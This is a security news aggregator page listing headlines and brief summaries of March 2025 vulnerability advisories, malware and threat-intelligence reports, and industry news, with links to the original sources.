Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7328-2: Linux kernel vulnerabilities
Attila Szász discovered that the HFS+ file system implementation in the Linux Kernel contained a heap overflow vulnerability. An attacker could use a specially crafted file system image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2025-0927) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - Block layer subsystem; (CVE-2024-56672)
https://ubuntu.com/security/notices/USN-7328-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Head Mare and Twelve join forces to attack Russian entities
We analyze the activities of the Head Mare hacktivist group, which has been attacking Russian companies jointly with Twelve.
https://securelist.com/head-mare-twelve-collaboration/115887/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Investigating Scam Crypto Investment Platforms Using Pyramid Schemes to Defraud Victims
We identified a campaign spreading thousands of sca crypto investment platforms through websites and mobile apps, possibly through a standardized toolkit. The post Investigating Scam Crypto Investment Platforms Using Pyramid Schemes to Defraud Victims appeared first on Unit 42.
https://unit42.paloaltonetworks.com/fraud-crypto-platforms-campaign/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7325-3: Linux kernel vulnerabilities
Attila Szász discovered that the HFS+ file system implementation in the Linux Kernel contained a heap overflow vulnerability. An attacker could use a specially crafted file system image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2025-0927) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - Media drivers; (CVE-2024-53104)
https://ubuntu.com/security/notices/USN-7325-3
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7332-3: Linux kernel vulnerabilities
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - PowerPC architecture; - Block layer subsystem; - GPIO subsystem; - GPU drivers; - Media drivers; - Network drivers; - SCSI subsystem; - Direct Digital Synthesis drivers; - TTY drivers; - 9P distributed file system; - JFS file system; - NILFS2 file system; - File systems infrastructure; - BPF subsystem; - Netfilter; - Network sockets; - Memory management; - Amateur Radio drivers; - B.A.T.M.A.N. meshing protocol; - Bluetooth subsystem; - Ethernet bridge; - Networking core; - IPv4 networking; - IPv6 networking; - Netlink; - TIPC protocol; - Wireless networking; ...
https://ubuntu.com/security/notices/USN-7332-3
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Modat launches premier product, Modat Magnify for Cybersecurity Professionals
The Hague, the Netherlands, 13th March 2025, CyberNewsWire
https://hackread.com/modat-launches-premier-product-modat-magnify-for-cybersecurity-professionals/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Medusa ransomware hit over 300 critical infrastructure organizations until February 2025
The Medusa ransomware operation hit over 300 organizations in critical infrastructure sectors in the United States until February 2025. The FBI, CISA, and MS-ISAC have issued a joint advisory detailing Medusa ransomware tactics, techniques, and indicators of compromise (IOCs) based on FBI investigations as recent as February 2025. This advisory is part of the #StopRansomware […]
https://securityaffairs.com/175319/cyber-crime/medusa-ransomware-hit-over-300-critical-infrastructure-organizations-until-february-2025.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bypassing Web Filters Part 2: Host Header Spoofing
In the last post about bypassing web filters, I discussed how SNI spoofing works and how this can also be prevented by web filters. This post is about another bypass technique called Host Header spoofing.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-2-host-header-spoofing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu des jours précédents

Sign in as anyone: Bypassing SAML SSO authentication with parser differentials
Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0. In this blog post, we'll shed light on how these vulnerabilities that rely on a parser differential were uncovered. The post Sign in as anyone: Bypassing SAML SSO authentication with parser differentials appeared first on The GitHub Blog.
https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7343-2: Jinja2 regression
USN-7343-1 fixed vulnerabilities in Jinja2. The update introduced a regression when attempting to import Jinja2 on Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Rafal Krupinski discovered that Jinja2 did not properly restrict the execution of code in situations where templates are used maliciously. An attacker with control over a template's filename and content could potentially use this issue to enable the execution of arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2024-56201) It was discovered that Jinja2 sandboxed environments could be escaped through a call to a string format method. An attacker could possibly use this issue to enable the execution of arbitrary...
https://ubuntu.com/security/notices/USN-7343-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Update your iPhone now: Apple patches vulnerability used in “extremely sophisticated attacks”
Apple has patched a vulnerability in iOS and iPadOS that was under active exploitation in extremely sophisticated attacks.
https://www.malwarebytes.com/blog/news/2025/03/update-your-iphone-now-apple-patches-vulnerability-used-in-extremely-sophisticated-attacks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7350-1: UnRAR vulnerabilities
It was discovered that UnRAR incorrectly handled certain paths. If a user or automated system were tricked into extracting a specially crafted RAR archive, a remote attacker could possibly use this issue to write arbitrary files outside of the targeted directory. (CVE-2022-30333, CVE-2022-48579) It was discovered that UnRAR incorrectly handled certain recovery volumes. If a user or automated system were tricked into extracting a specially crafted RAR archive, a remote attacker could possibly use this issue to execute arbitrary code. (CVE-2023-40477) Siddharth Dushantha discovered that UnRAR incorrectly handled ANSI escape sequences when writing screen output. If a user or automated system were tricked into processing a specially crafted RAR archive, a remote attacker could possibly use this...
https://ubuntu.com/security/notices/USN-7350-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7349-1: RAR vulnerabilities
It was discovered that RAR incorrectly handled certain paths. If a user or automated system were tricked into extracting a specially crafted RAR archive, a remote attacker could possibly use this issue to write arbitrary files outside of the targeted directory. (CVE-2022-30333) It was discovered that RAR incorrectly handled certain recovery volumes. If a user or automated system were tricked into extracting a specially crafted RAR archive, a remote attacker could possibly use this issue to execute arbitrary code. (CVE-2023-40477)
https://ubuntu.com/security/notices/USN-7349-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

KnowBe4 research reveals a confidence gap in cybersecurity, putting organisations at risk
KnowBe4, cybersecurity platform that comprehensively addresses human risk management, has released new research indicating that while 86% of employees believe they can confidently identify phishing emails, nearly half have fallen for scams. The study, which surveyed professionals across the UK, USA, Germany, France, Netherlands, and South Africa, reveals a growing gap between confidence and competence […] The post KnowBe4 research reveals a confidence gap in cybersecurity, putting organisations at risk appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/12/knowbe4-research-reveals-a-confidence-gap-in-cybersecurity-putting-organisations-at-risk/?utm_source=rss&utm_medium=rss&utm_campaign=knowbe4-research-reveals-a-confidence-gap-in-cybersecurity-putting-organisations-at-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Best Practices and Risks Considerations in Automation like LCNC and RPA
Technologies such as Low-Code/No-Code (LCNC) and Robotic Process Automation (RPA) have become fundamental in the digital transformation of companies. They continue to evolve and redefine software development, providing new possibilities for different... The post Best Practices and Risks Considerations in Automation like LCNC and RPA appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/best-practices-and-risks-considerations-in-automation-like-lcnc-and-rpa/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransom & Dark Web Issues Week 2, March 2025
ASEC Blog publishes Ransom & Dark Web Issues Week 2, March 2025           New ransomware group SecP0 demands ransom for corporate vulnerabilities. Pro-Palestinian hacktivist group RipperSec claims DDoS attacks on South Korean telecom companies, public institutions, and education-related websites. Pro-Palestinian hacktivist group Dark Storm Team claims large-scale DDoS attack on X. […]
https://asec.ahnlab.com/en/86775/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7348-1: Python vulnerabilities
It was discovered that the Python ipaddress module contained incorrect information about which IP address ranges were considered “private” or “globally reachable”. This could possibly result in applications applying incorrect security policies. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2024-4032) It was discovered that Python incorrectly handled quoting path names when using the venv module. A local attacker able to control virtual environments could possibly use this issue to execute arbitrary code when the virtual environment is activated. (CVE-2024-9287) It was discovered that Python incorrectly handled parsing bracketed hosts. A remote attacker could possibly use this issue to perform a Server-Side Request Forgery (SSRF) attack. This issue only affected...
https://ubuntu.com/security/notices/USN-7348-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The dark side of sports betting: How mirror sites help gambling scams thrive
Sports betting is a multi-billion-dollar industry, but behind the flashing lights and promises of easy money lies a hidden underworld of deception.
https://www.malwarebytes.com/blog/personal/2025/03/the-dark-side-of-sports-betting-how-mirror-sites-help-gambling-scams-thrive
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Security-Conscious Sysadmin's Guide to Choosing the Right Linux Distro
When it comes to maintaining the security and efficiency of your systems, selecting a Linux distribution can make all the difference. Junior sysadmins who prioritize security often come down to three popular choices: Debian , Fedora , and Ubuntu .
https://linuxsecurity.com/features/features/choosing-the-right-linux-distro
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Explaining External Network Assessment with Vector Command
Learn how external network assessment works within Vector Command, Rapid7's continuous red team managed service.
https://blog.rapid7.com/2025/03/12/explaining-external-network-assessment-with-vector-command/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Intersection of Digital Credit Solutions and Cybersecurity: Protecting Consumer Data in the Automotive Finance Industry
Digital credit solutions deliver convenience, speed, and flexibility. Along with its benefits, however, comes risk. Protecting consumer data has always been a priority for dealerships. It's now a more complex... The post The Intersection of Digital Credit Solutions and Cybersecurity: Protecting Consumer Data in the Automotive Finance Industry appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-intersection-of-digital-credit-solutions-and-cybersecurity-protecting-consumer-data-in-the-automotive-finance-industry/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

WatchGuard unveils FireCloud Internet Access
WatchGuard® Technologies, a provider of unified cybersecurity, has announced the launch of FireCloud Internet Access, the first in what it’s describing as “a new family of hybrid secure access service edge (SASE) products”. The company said that FireCloud “uniquely meets the needs of hybrid organisations and WatchGuard's partners by delivering consistency across Fireboxes and FireCloud […] The post WatchGuard unveils FireCloud Internet Access appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/12/watchguard-unveils-firecloud-internet-access/?utm_source=rss&utm_medium=rss&utm_campaign=watchguard-unveils-firecloud-internet-access
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Android devices track you before you even sign in
Google spies on Android device users, starting from even before they have logged in to their Google account.
https://www.malwarebytes.com/blog/news/2025/03/android-devices-track-you-before-you-even-sign-in
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Incident response analyst report 2024
Kaspersky provides incident response statistics for 2024, as well real incidents analysis. The report also shares IR trends and cybersecurity recommendations.
https://securelist.com/kaspersky-incident-response-report-2024/115873/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft: 6 Zero-Days in March 2025 Patch Tuesday
Microsoft today issued more than 50 security updates for its various Windows operating systems, including fixes for a whopping six zero-day vulnerabilities that are already seeing active exploitation.
https://krebsonsecurity.com/2025/03/microsoft-6-zero-days-in-march-2025-patch-tuesday/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Patch Tuesday - March 2025
Seven zero-days. Win32 EoP. Multiple filesystem driver attacks. MMC security feature bypass. Access (again). WSL magic email RCE. Malicious RDP server.
https://blog.rapid7.com/2025/03/11/patch-tuesday-march-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Alleged Co-Founder of Garantex Arrested in India
Authorities in India today arrested the alleged co-founder of Garantex, a cryptocurrency exchange sanctioned by the U.S. government in 2022 for facilitating tens of billions of dollars in money laundering by transnational criminal and cybercriminal organizations. Sources close to the investigation told KrebsOnSecurity the Lithuanian national Aleksej Besciokov, 46, was apprehended while vacationing on the coast of India with his family.
https://krebsonsecurity.com/2025/03/alleged-co-founder-of-garantex-arrested-in-india/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects
Microsoft Threat Intelligence has uncovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects, in the wild. Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies. These enhanced features help this malware family steal and exfiltrate files and system and user information, such as digital wallet data and notes, among others. The post New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/11/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

2025 Cybersecurity Trends and Predictions: Adapting To An Era Of Evolving Threads And Technology
All organizations today rely on technology. Whether you’re a small non-profit, a government agency, a hospital, or a traditional business, digital tools power everything from communications to service delivery to... The post 2025 Cybersecurity Trends and Predictions: Adapting To An Era Of Evolving Threads And Technology appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/2025-cybersecurity-trends-and-predictions-adapting-to-an-era-of-evolving-threads-and-technology/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Weekly Detection Rule (YARA and Snort) Information – Week 2, March 2025
The following is the information on Yara and Snort rules (week 2, March 2025) collected and shared by the AhnLab TIP service. 5 YARA Rules Detection name Description Source PK_Generic_RD127 Phishing Kit – RD127 – Generic email credentials stealer https://github.com/t4d/PhishingKit-Yara-Rules PK_LIDL_ninja Phishing Kit impersonating LIDL https://github.com/t4d/PhishingKit-Yara-Rules PK_MTBank_yochi2 Phishing Kit impersonating M&T Bank https://github.com/t4d/PhishingKit-Yara-Rules PK_SpareBank_perso Phishing […]
https://asec.ahnlab.com/en/86759/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

February 2025 Security Issues in Korean & Global Financial Sector
This report comprehensively covers actual cyber threats and security issues that have occurred in the financial industry in South Korea and abroad. This includes an analysis of malware and phishing cases targeting the financial industry, a list of the top 10 malware strains that target the industry, and statistics on the industries of the Korean […]
https://asec.ahnlab.com/en/86831/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Enhancing Cybersecurity Quality Assurance with AI & Machine Learning
Cyber threats and Linux vulnerabilities are advancing and evolving at an unprecedented pace, becoming increasingly difficult to detect and mitigate. This worrisome trend makes it imperative for organizations to adopt robust and adaptive security measures to counter these growing risks.
https://linuxsecurity.com/features/features/how-ai-and-machine-learning-are-transforming-cybersecurity-quality-assurance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Certifications And Career Opportunities For Women In Cybersecurity
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full BBN Times story Sausalito, Calif. – Mar. 11, 2025 Despite the increasing efforts to increase women's representation in cybersecurity, the industry still has a long way to go. However, there is progress on The post Certifications And Career Opportunities For Women In Cybersecurity appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/certifications-and-career-opportunities-for-women-in-cybersecurity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Rise Of AI-Powered Cyber Threats: How Adversaries Are Using “Good Enough” Tactics to Outsmart Defenders
As we move into 2025, organizations are laser-focused on maximizing resources and achieving better business outcomes. Increasingly, this translates into leveraging AI and automation to streamline operations, improve efficiency, and... The post The Rise Of AI-Powered Cyber Threats: How Adversaries Are Using “Good Enough” Tactics to Outsmart Defenders appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-rise-of-ai-powered-cyber-threats-how-adversaries-are-using-good-enough-tactics-to-outsmart-defenders/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Helping us help you: Practical applications of AI in the SOC
Whether or not you're a customer of Rapid7's managed security offerings, it's worth understanding how AI is already transforming security operations today – not as a vague promise of the future, but as a real, tangible advantage in the fight against cyber threats.
https://blog.rapid7.com/2025/03/11/helping-us-help-you-practical-applications-of-ai-in-the-soc/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bypassing picklescan: Sonatype discovers four vulnerabilities
Sonatype has discovered and disclosed four vulnerabilities in picklescan, a tool designed to help developers scan Python pickle files for malicious content. Pickle files, used for serializing and deserializing Python AI/ML models, can be a security risk as they allow for arbitrary code execution during the deserialization process.
https://www.sonatype.com/blog/bypassing-picklescan-sonatype-discovers-four-vulnerabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DCRat backdoor returns
Kaspersky experts describe a new wave of attacks distributing the DCRat backdoor through YouTube under the guise of game cheats.
https://securelist.com/new-wave-of-attacks-with-dcrat-backdoor-distributed-by-maas/115850/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bypassing Web Filters Part 1: SNI Spoofing
This is the first part of a series of blog posts about techniques to bypass web filters, looking at increasingly advanced techniques with each part. The first part is about how SNI spoofing can be used to bypass web filters.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-1-sni-spoofing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Web application firewall rules bypass by using an empty filename
Two improper handling of syntactically invalid structure vulnerabilities [CWE-228] in FortiWeb may allow an unauthenticated attacker to bypass web firewall protections via HTTP/S crafted requests. Revised on 2025-03-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-115
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apache Camel Vulnerability - CVE-2025-27636
CVE-2025-27636Bypass/Injection vulnerability in Apache Camel-Bean component under particular conditions. This issue affects Apache Camel: from 4.10.0 through
https://fortiguard.fortinet.com/psirt/FG-IR-25-166
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Authenticated SQLI on CLI
Two improper neutralization of special elements used in an SQL Command ('SQL Injection') vulnerability [CWE-89] in FortiAnalyzer, FortiManager & FortiAnalyzer-BigData may allow a privileged attacker to execute unauthorized code or commands via specifically crafted CLI requests. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-130
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Client-side enforcement of server-side security related to vm download feature
A client-side enforcement of server-side security vulnerability [CWE-602] in FortiSandbox may allow an authenticated attacker with at least read-only permission to execute unauthorized commands via crafted requests. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-305
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cross Site Request Forgery in admin endpoint
A cross site request forgery vulnerability [CWE-352] in FortiNDR may allow a remote unauthenticated attacker to execute unauthorized actions via crafted HTTP GET requests. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-353
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Directory Traversal Arbitrary File Write Vulnerability
An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability [CWE-22] in FortiWeb API endpoint may allow an authenticated attacker with admin privileges to access and modify the filesystem. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-439
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Exposure of Sensitive Information to an Unauthorized Actor
An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiSIEM may allow a remote unauthenticated attacker who acquired knowledge of the agent's authorization header by other means to read the database password via crafted api requests Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-117
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Incorrect authorization in GUI console
An incorrect authorization vulnerability [CWE-863] in FortiSandbox may allow a low priviledged administrator to execute elevated CLI commands via the GUI console menu. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-261
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Incorrect authorization in incident page
An incorrect authorization vulnerability [CWE-863] in FortiSIEM may allow an authenticated attacker to perform unauthorized operations on incidents via crafted HTTP requests. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-377
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

VMware Multiple Products Zero-day Vulnerabilities
What is the Vulnerability?Multiple zero-day vulnerabilities have been identified in VMware's ESXi, Workstation, and Fusion products. VMware has confirmed that these vulnerabilities are being actively exploited in the wild, and the Cybersecurity and Infrastructure Security Agency (CISA) has included them in its Known Exploited Vulnerabilities Catalog due to evidence of such exploitation.The vendor advisory indicates that these vulnerabilities were reported to VMware by the Microsoft Threat Intelligence Center.• CVE-2025-22225: Arbitrary Write Vulnerability in VMware ESXi • CVE-2025-22224: TOCTOU Race Condition Vulnerability in VMware ESXi and Workstation • CVE-2025-22226: Information Disclosure Vulnerability in VMware ESXi, Workstation, and FusionWhat is the recommended Mitigation?Updates...
https://fortiguard.fortinet.com/threat-signal-report/6026
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

X users report login troubles as Dark Storm claims cyberattack
In the early morning hours of March 10, thousands of users on X (formerly Twitter) began having trouble logging into the...
https://www.malwarebytes.com/blog/news/2025/03/x-users-report-login-troubles-as-dark-storm-claims-cyberattack
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI Security and Governance
Originally written by Hyland Security.   Artificial Intelligence (AI) has become an integral part of our daily lives and business operations, permeating various industries with its advanced capabilities. However, the rapid adoption of AI technologies also brings significant risks and challenges, necessitating robust AI security and governance that AI systems operate transparently, ethically, and within regulatory frameworks, safeguarding individual rights and societal interests. &n...
https://cloudsecurityalliance.org/articles/ai-security-and-governance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MIWIC25 – Eva Benn, Chief of Staff, Strategy – Microsoft Red Team
Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024's Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee's answers are […] The post MIWIC25 – Eva Benn, Chief of Staff, Strategy – Microsoft Red Team appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/10/miwic25-eva-benn-chief-of-staff-strategy-microsoft-red-team/?utm_source=rss&utm_medium=rss&utm_campaign=miwic25-eva-benn-chief-of-staff-strategy-microsoft-red-team
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How ads weirdly know your screen brightness, headphone jack use, and location, with Tim Shott (Lock and Code S06E05)
This week on the Lock and Code podcast, we speak with Tim Shott about his attempt to find his location data following a major data breach.
https://www.malwarebytes.com/blog/podcast/2025/03/how-ads-weirdly-know-your-screen-brightness-headphone-jack-use-and-location-with-tim-shott-lock-and-code-s06e05
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Full exposure: A practical approach to handling sensitive data leaks
Treating exposures as full and complete can help you respond more effectively to focus on what truly matters: securing systems, protecting sensitive data, and maintaining the trust of stakeholders. The post Full exposure: A practical approach to handling sensitive data leaks appeared first on The GitHub Blog.
https://github.blog/security/full-exposure-a-practical-approach-to-handling-sensitive-data-leaks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Navigating Cyber Security Implementation Challenges in SMBs
Cyber Security is often low priority for SMBs. Many SMBs lack dedicated security specialist; instead, security responsibilities are typically handled by IT department which is already overwhelmed with general IT... The post Navigating Cyber Security Implementation Challenges in SMBs appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/navigating-cyber-security-implementation-challenges-in-smbs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

February 2025 Infostealer Trend Report
This report provides statistics, trends, and case information on the distribution quantity, distribution methods, and disguise techniques of Infostealer collected and analyzed during February 2025. Below is a summary of the report.   1. Data Sources and Collection Methods   To proactively repond to Infostealer, AhnLab SEcurity intelligence Center (ASEC) operates various systems that automatically […]
https://asec.ahnlab.com/en/86766/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

February 2025 APT Group Trends (South Korea)
Overview   AhnLab is monitoring Advanced Persistent Threat (APT) attacks in South Korea using its own infrastructure. This report covers the classification, statistics, and features of the APT attacks in South Korea that were identified in February 2025, as well as the attack types.   Figure 1. Statistics of APT attacks in South Korea in […]
https://asec.ahnlab.com/en/86830/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fake CAPTCHA websites hijack your clipboard to install information stealers
An increasing number of websites use a clipboard hijacker and instruct victims on how to infect their own machine.
https://www.malwarebytes.com/blog/news/2025/03/fake-captcha-websites-hijack-your-clipboard-to-install-information-stealers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Seeing The Whole Picture: A Better Way To Manage Your Attack Surface
With cloud adoption, remote work, shadow IT, and AI, security teams face an overwhelming challenge: scoping their attack surface and continuously discovering all assets and exposures before threats emerge.
https://blog.rapid7.com/2025/03/10/seeing-the-whole-picture-a-better-way-to-manage-your-attack-surface/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HACK Global Cybersecurity ETF Reaches B In Assets Under Management
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Betashares Sausalito, Calif. – Mar. 10, 2025 With so many interconnected devices in business and at home, cybersecurity isn't just a line item on IT budgets – it's a necessity The post HACK Global Cybersecurity ETF Reaches B In Assets Under Management appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/hack-global-cybersecurity-etf-reaches-1b-in-assets-under-management/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SideWinder targets the maritime and nuclear sectors with an updated toolset
In this article, we discuss the tools and TTPs used in the SideWinder APT's attacks in H2 2024, as well as shifts in its targets, such as an increase in attacks against the maritime and logistics sectors.
https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A week in security (March 3 – March 9)
A list of topics we covered in the week of March 3 to March 9 of 2025
https://www.malwarebytes.com/blog/news/2025/03/a-week-in-security-march-3-march-9
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malwarebytes Premium Security awarded “Product of the Year” from AVLab
Malwarebytes Premium Security has once again been awarded “Product of the Year” after successfully blocking 100% of “in-the-wild” malware samples.
https://www.malwarebytes.com/blog/personal/2025/03/malwarebytes-premium-security-awarded-product-of-the-year-from-avlab
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

February 2025 Threat Trend Report on Ransomware
This report provides statistics on the number of new ransomware samples, number of targeted systems, and targeted companies collected in February 2025, as well as major Korean and international ransomware issues worth noting. Below are the summarized details.   The number of ransomware samples and number of damaged systems is based on the detection names […]
https://asec.ahnlab.com/en/86763/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Feds Link 0M Cyberheist to 2022 LastPass Hacks
In September 2023, KrebsOnSecurity published findings from security researchers who concluded that a series of six-figure cyberheists across dozens of victims resulted from thieves cracking master passwords stolen from the password manager service LastPass in 2022. In a court filing this week, U.S. federal agents investigating a spectacular 0 million cryptocurrency heist said they had reached the same conclusion.
https://krebsonsecurity.com/2025/03/feds-link-150m-cyberheist-to-2022-lastpass-hacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Hidden Costs of Manual GRC in a Cloud-First World
Originally published by RegScale.   Before I joined RegScale, I was a big buyer of legacy GRC tools. I won't name any particular tools, but most of them featured 20-year-old approaches and “automation” in name only. At the end of the day, they left teams heavily reliant on manual processes disguised as digital solutions, with no shortage of spreadsheets and tedious tasks.  At the same time, I've watched two major trends reshape the GRC landscape:  The shift to cloud-na...
https://cloudsecurityalliance.org/articles/the-hidden-costs-of-manual-grc-in-a-cloud-first-world
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Reward Program: 2024 in Review
Posted by Dirk GöhmannIn 2024, our Vulnerability Reward Program confirmed the ongoing value of engaging with the security research community to make Google and its products safer. This was evident as we awarded just shy of million to over 600 researchers based in countries around the globe across all of our programs.Vulnerability Reward Program 2024 in NumbersYou can learn about who's reporting to the Vulnerability Reward Program via our Leaderboard – and find out more about our youngest security researchers who've recently joined the ranks of Google bug hunters.VRP Highlights in 2024In 2024 we made a series of changes and improvements coming to our vulnerability reward programs and related initiatives:The Google VRP revamped its reward structure, bumping rewards up to a maximum...
http://security.googleblog.com/2025/03/vulnerability-reward-program-2024-in.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Reddit will start warning users that upvote violent content
Reddit administratrion announced that the platformwill start sending warnings to users that upvote violent content.
https://www.malwarebytes.com/blog/news/2025/03/reddit-will-start-warning-users-that-upvote-violent-content
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Ransomware Epidemic: Why SMEs Are The New Primary Target
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Forbes Sausalito, Calif. – Mar. 7, 2025 Forbes Technology Council Member Aliasgar Dohadwala points out that for small and medium enterprises (SMEs), the consequences of ransomware can be catastrophic, with 60 The post The Ransomware Epidemic: Why SMEs Are The New Primary Target appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-ransomware-epidemic-why-smes-are-the-new-primary-target/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Advancing Gender Equality in 2025 and Beyond
International Women's Day (IWD) 2025 carries the powerful theme: ‘Accelerate Action.' This theme calls on individuals, communities, and organisations to take decisive steps toward achieving gender equality. Despite ongoing efforts, at the current rate of progress, it will take until 2158, more than five generations, to reach full gender parity, according to the World Economic […] The post Advancing Gender Equality in 2025 and Beyond appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/07/advancing-gender-equality-in-2025-and-beyond/?utm_source=rss&utm_medium=rss&utm_campaign=advancing-gender-equality-in-2025-and-beyond
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Multiple Vulnerabilities Discovered in a SCADA System
We identified multiple vulnerabilities in ICONICS Suite, SCADA software used in numerous OT applications. This article offers a technical analysis of our findings. The post Multiple Vulnerabilities Discovered in a SCADA System appeared first on Unit 42.
